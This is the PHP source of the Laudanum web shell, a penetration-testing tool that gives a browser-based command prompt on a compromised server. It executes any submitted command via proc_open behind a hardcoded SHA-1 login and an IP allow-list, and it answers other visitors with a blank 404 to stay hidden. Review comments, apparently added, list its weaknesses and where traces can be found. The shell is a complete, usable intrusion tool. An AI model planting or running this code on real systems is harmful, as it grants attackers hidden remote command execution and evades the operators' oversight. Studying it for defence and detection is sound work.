terst

  1. <?php
  2. /* *****************************************************************************
  3. ***
  4. *** Laudanum Project
  5. *** A Collection of Injectable Files used during a Penetration Test
  6. ***
  7. *** More information is available at:
  8. *** http://laudanum.secureideas.net
  9. *** laudanum@secureideas.net
  10. ***
  11. *** Project Leads:
  12. *** Kevin Johnson <kjohnson@secureideas.net>
  13. *** Tim Medin <tim@counterhack.com>
  14. ***
  15. *** Copyright 2014 by Kevin Johnson and the Laudanum Team
  16. ***
  17. ********************************************************************************
  18. ***
  19. *** This file provides shell access to the system. It is built based on the 2.1
  20. *** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler
  21. *** <mgeisler[at]mgeisler.net>
  22. ***
  23. *** Updated by Tim Medin
  24. ***
  25. ********************************************************************************
  26. *** This program is free software; you can redistribute it and/or
  27. *** modify it under the terms of the GNU General Public License
  28. *** as published by the Free Software Foundation; either version 2
  29. *** of the License, or (at your option) any later version.
  30. ***
  31. *** This program is distributed in the hope that it will be useful,
  32. *** but WITHOUT ANY WARRANTY; without even the implied warranty of
  33. *** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  34. *** GNU General Public License for more details.
  35. ***
  36. *** You can get a copy of the GNU General Public License from this
  37. *** address: http://www.gnu.org/copyleft/gpl.html#SEC1
  38. *** You can also write to the Free Software Foundation, Inc., 59 Temple
  39. *** Place - Suite 330, Boston, MA 02111-1307, USA.
  40. ***
  41. ***************************************************************************** */
  42.  
// ***************** Config entries below ***********************

// IPs are enterable as individual addresses TODO: add CIDR support
// Each entry must equal $_SERVER["REMOTE_ADDR"] exactly (see the loop below):
// no CIDR ranges and no IPv6 normalisation are applied.
$allowedIPs = array("192.168.1.55", "12.2.2.2");

# format is "username" => "password"
# password is generated using sha1sum as shown below (don't forget the -n, KEVIN!)
# echo -n Password1 | sha1sum
# NOTE(review): these values are unsalted SHA-1 digests of the plain password;
# the login code further down compares them with a loose `==`, not hash_equals().
$users = array("kevin" => "b441ac06613fc8d63795be9ad0beaf55011936ac", "tim" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3", "yomamma" => "a94a1fe5ccb19ba61c4c0873d391e987982fbbd3");

# *********** No editable content below this line **************

/* Client allow-list. The request continues only if REMOTE_ADDR is one of the
 * configured strings. Behind a reverse proxy or load balancer REMOTE_ADDR is
 * the proxy's own address, so the check then admits either every client or
 * none of them. `==` is a loose comparison; `===` would make the intended
 * string match explicit. */
$allowed = 0;
foreach ($allowedIPs as $IP) {
    if ($_SERVER["REMOTE_ADDR"] == $IP)
        $allowed = 1;
}

/* Everyone else receives a bare 404 with no body, so fetching the URL from a
 * non-listed address looks like a missing file. Locating a deployed copy is
 * therefore a job for filesystem review and web-server access logs rather
 * than for HTTP probing of the path. */
if ($allowed == 0) {
    header("HTTP/1.0 404 Not Found");
    die();
}
  65.  
  66.  
  67.  
  68. /* This error handler will turn all notices, warnings, and errors into fatal
  69. * errors, unless they have been suppressed with the @-operator. */
  70. function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
  71. /* The @-opertor (used with chdir() below) temporarely makes
  72. * error_reporting() return zero, and we don't want to die in that case.
  73. * We do note the error in the output, though. */
  74. if (error_reporting() == 0) {
  75. $_SESSION['output'] .= $errstr . "\n";
  76. } else {
  77. die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
  78. "http://www.w3.org/TR/html4/strict.dtd">
  79. <html>
  80. <head>
  81. <title>Laudanum PHP Shell Access</title>
  82. </head>
  83. <body>
  84. <h1>Fatal Error!</h1>
  85. <p><b>' . $errstr . '</b></p>
  86. <p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
  87.  
  88. <hr>
  89. <address>
  90. Copyright &copy; 2014, <a
  91. href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br>
  92. Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
  93. </address>
  94.  
  95. </body>
  96. </html>');
  97. }
  98. }
  99.  
// Install the handler above for the rest of the request: from here on any
// notice or warning that is not @-suppressed ends the script with the
// "Fatal Error!" page instead of being logged.
set_error_handler('error_handler');
  101.  
  102.  
  103. function logout() {
  104. $_SESSION = array('authenticated' => false);
  105. if (isset($_COOKIE[session_name()]))
  106. setcookie(session_name(), '', time()-42000, '/');
  107. session_destroy();
  108. }
  109.  
  110.  
  111. function stripslashes_deep($value) {
  112. if (is_array($value))
  113. return array_map('stripslashes_deep', $value);
  114. else
  115. return stripslashes($value);
  116. }
  117.  
// NOTE(review): get_magic_quotes_gpc() always returns false since PHP 5.4 and
// was removed in PHP 8.0, where this call is a fatal undefined-function error.
if (get_magic_quotes_gpc())
    $_POST = stripslashes_deep($_POST);

/* Initialize some variables we need again and again. Each is read straight
 * from the POST body and none is validated or cast here; $rows and $columns
 * are later used for putenv(), arithmetic and HTML attributes as received. */
$username = isset($_POST['username']) ? $_POST['username'] : '';
$password = isset($_POST['password']) ? $_POST['password'] : '';
$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';

$command = isset($_POST['command']) ? $_POST['command'] : '';
$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;


///* Default settings --- these settings should always be set to something. */
//$default_settings = array('home-directory' => '.');

///* Merge settings. */
//$ini['settings'] = array_merge($default_settings, $ini['settings']);


// Default PHP session handling: cookie named session_name(), server-side data
// in the configured session store. No cookie flags are set explicitly here.
session_start();

/* Delete the session data if the user requested a logout. This leaves the
 * session cookie at the user, but this is not important since we
 * authenticate on $_SESSION['authenticated']. */
if (isset($_POST['logout']))
    logout();

///* Attempt authentication. */
//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
// isset($ini['users'][$username])) {
// if (strchr($ini['users'][$username], ':') === false) {
// // No seperator found, assume this is a password in clear text.
// $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
// } else {
// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
// }
//}

/* Attempt authentication. Both comparisons are loose `==`: the submitted
 * nonce against the one stored in the session, and the configured digest
 * against the unsalted SHA-1 of the submitted password. `===`, or
 * hash_equals() for the digest (which is also constant-time), is the strict
 * form. A request with no valid nonce or an unknown username leaves
 * $_SESSION['authenticated'] untouched. */
if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))
    $_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password));

/* Enforce default non-authenticated state if the above code didn't set it
 * already. */
if (!isset($_SESSION['authenticated']))
    $_SESSION['authenticated'] = false;
  166.  
if ($_SESSION['authenticated']) {
    /* Initialize the session variables. Everything the shell remembers
     * between requests -- working directory, every command typed and the
     * accumulated command output -- lives in $_SESSION, i.e. in PHP's
     * server-side session store. That store is where the operator's command
     * history can be recovered after the fact. */
    if (empty($_SESSION['cwd'])) {
        $_SESSION['cwd'] = '.';
        $_SESSION['history'] = array();
        $_SESSION['output'] = '';
    }

    if (!empty($command)) {
        /* Save the command for late use in the JavaScript. If the command is
         * already in the history, then the old entry is removed before the
         * new entry is put into the list at the front. */
        if (($i = array_search($command, $_SESSION['history'])) !== false)
            unset($_SESSION['history'][$i]);

        array_unshift($_SESSION['history'], $command);

        /* Now append the command to the output. */
        $_SESSION['output'] .= '$ ' . $command . "\n";

        /* Initialize the current working directory. */
        if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {
            // NOTE(review): $ini is never assigned in this file (it survives
            // only in the commented-out PHPShell code above), so a bare `cd`
            // raises an undefined-variable notice, which error_handler()
            // turns into the "Fatal Error!" page.
            $_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
        } elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) {
            /* The current command is a 'cd' command which we have to handle
             * as an internal shell command. */

            // NOTE(review): the `{0}` string-offset syntax was deprecated in
            // PHP 7.4 and removed in 8.0 (parse error there); `[0]` is the
            // equivalent.
            if ($regs[1]{0} == '/') {
                /* Absolute path, we use it unchanged. */
                $new_dir = $regs[1];
            } else {
                /* Relative path, we append it to the current working
                 * directory. */
                $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
            }

            /* Transform '/./' into '/' */
            while (strpos($new_dir, '/./') !== false)
                $new_dir = str_replace('/./', '/', $new_dir);

            /* Transform '//' into '/' */
            while (strpos($new_dir, '//') !== false)
                $new_dir = str_replace('//', '/', $new_dir);

            /* Transform 'x/..' into '' */
            while (preg_match('|/\.\.(?!\.)|', $new_dir))
                $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);

            if ($new_dir == '') $new_dir = '/';

            /* Try to change directory. The @ keeps a failed chdir() from
             * reaching error_handler() as a fatal error; the handler instead
             * appends the warning text to the output. */
            if (@chdir($new_dir)) {
                $_SESSION['cwd'] = $new_dir;
            } else {
                $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
            }

        } elseif (trim($command) == 'exit') {
            logout();
        } else {

            /* The command is not an internal command, so we execute it after
             * changing the directory and save the output. */
            chdir($_SESSION['cwd']);

            // We cannot use putenv() in safe mode.
            // NOTE(review): safe_mode was removed in PHP 5.4 and ini_get() of
            // an unknown setting returns false, so on current PHP this branch
            // always runs with the raw POST values.
            if (!ini_get('safe_mode')) {
                // Advise programs (ls for example) of the terminal size.
                // The child process spawned below inherits these variables.
                putenv('ROWS=' . $rows);
                putenv('COLUMNS=' . $columns);
            }

            /* Alias expansion. isset() on the undefined $ini is silent, so in
             * this file the lookup never matches and this is a no-op. */
            $length = strcspn($command, " \t");
            $token = substr($command, 0, $length);
            if (isset($ini['aliases'][$token]))
                $command = $ini['aliases'][$token] . substr($command, $length);

            /* Hand the command line to the system shell (proc_open() string
             * form), capturing stdout (1) and stderr (2); stdin is not
             * redirected. proc_open() returns false on failure, in which case
             * $io[1] below is undefined and error_handler() ends the request. */
            $io = array();
            $p = proc_open($command,
                array(1 => array('pipe', 'w'),
                      2 => array('pipe', 'w')),
                $io);

            /* Read output sent to stdout. The complete output is buffered
             * into the session with no size limit, and is HTML-escaped here
             * because it is later printed inside a <textarea>. */
            while (!feof($io[1])) {
                $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
                                                       ENT_COMPAT, 'UTF-8');
            }
            /* Read output sent to stderr. This is only read after stdout hits
             * EOF, so a child that fills the stderr pipe first can block
             * both sides. */
            while (!feof($io[2])) {
                $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
                                                       ENT_COMPAT, 'UTF-8');
            }

            fclose($io[1]);
            fclose($io[2]);
            proc_close($p);
        }
    }

    /* Build the command history for use in the JavaScript. addslashes()
     * escapes quotes and backslashes only; it is not a JavaScript-string or
     * HTML-context encoder (json_encode() would be the idiomatic choice). */
    if (empty($_SESSION['history'])) {
        $js_command_hist = '""';
    } else {
        $escaped = array_map('addslashes', $_SESSION['history']);
        $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
    }
}
  276.  
  277. ?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
"http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Laudanum Shell</title>
<link rel="stylesheet" href="style.css" type="text/css">

<script type="text/javascript">
<?php if ($_SESSION['authenticated']) { ?>

var current_line = 0;
<?php /* $js_command_hist was built with addslashes() only (see above), which
         escapes quotes and backslashes but is not a JavaScript/HTML-context
         encoder; json_encode() would be the usual way to emit this array. */ ?>
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;

function key(e) {
if (!e) var e = window.event;

if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
current_line++;
document.shell.command.value = command_hist[current_line];
}

if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
current_line--;
document.shell.command.value = command_hist[current_line];
}

}

function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
document.shell.command.focus();
}

<?php } else { ?>

function init() {
document.shell.username.focus();
}

<?php } ?>
</script>
</head>

<body onload="init()">

<h1>Laudanum Shell</h1>

<?php /* NOTE(review): PHP_SELF includes any path-info from the request URL and
         is echoed here without htmlspecialchars(). Escaping it, or using an
         empty action to post back to the same URL, avoids reflecting request
         data into the page. */ ?>
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">

<?php
if (!$_SESSION['authenticated']) {
/* Generate a new nonce every time we present the login page. This binds
 * each login to a unique hit on the server and prevents the simple replay
 * attack where one uses the back button in the browser to replay the POST
 * data from a login. */
// NOTE(review): mt_rand() is not a cryptographic generator; random_int() is
// the modern choice for a per-login token.
$_SESSION['nounce'] = mt_rand();

?>

<fieldset>
<legend>Authentication</legend>

<?php
if (!empty($username))
echo ' <p class="error">Login failed, please try again:</p>' . "\n";
else
echo " <p>Please login:</p>\n";
?>

<?php /* $username comes straight from POST and is reflected into the
         attribute below unescaped; htmlspecialchars() is the fix. */ ?>
<p>Username: <input name="username" type="text" value="<?php echo $username
?>"></p>

<p>Password: <input name="password" type="password"></p>

<p><input type="submit" value="Login"></p>

<input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce']; ?>">

</fieldset>

<?php } else { /* Authenticated. */ ?>

<fieldset>
<legend>Current Working Directory: <code><?php
echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8');
?></code></legend>


<div id="terminal">
<?php /* $columns and $rows are the unvalidated POST values; here, in the
         prompt's size attribute and in the size inputs further down they are
         echoed into attributes without escaping. */ ?>
<textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>">
<?php
$lines = substr_count($_SESSION['output'], "\n");
// NOTE(review): $rows is still the raw POST string; a non-numeric value here
// is a warning (fatal via error_handler()) on PHP 7 and a TypeError on PHP 8.
$padding = str_repeat("\n", max(0, $rows+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
?>
</textarea>
<p id="prompt">
$&nbsp;<input name="command" type="text"
onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1">
</p>
</div>

<p>
<span style="float: right">Size: <input type="text" name="rows" size="2"
maxlength="3" value="<?php echo $rows ?>"> &times; <input type="text"
name="columns" size="2" maxlength="3" value="<?php echo $columns
?>"></span>

<input type="submit" value="Execute Command">
<input type="submit" name="logout" value="Logout">
</p>

</fieldset>

<?php } ?>

</form>


<hr/>
<address>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Updated by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
</address>

</body>
</html>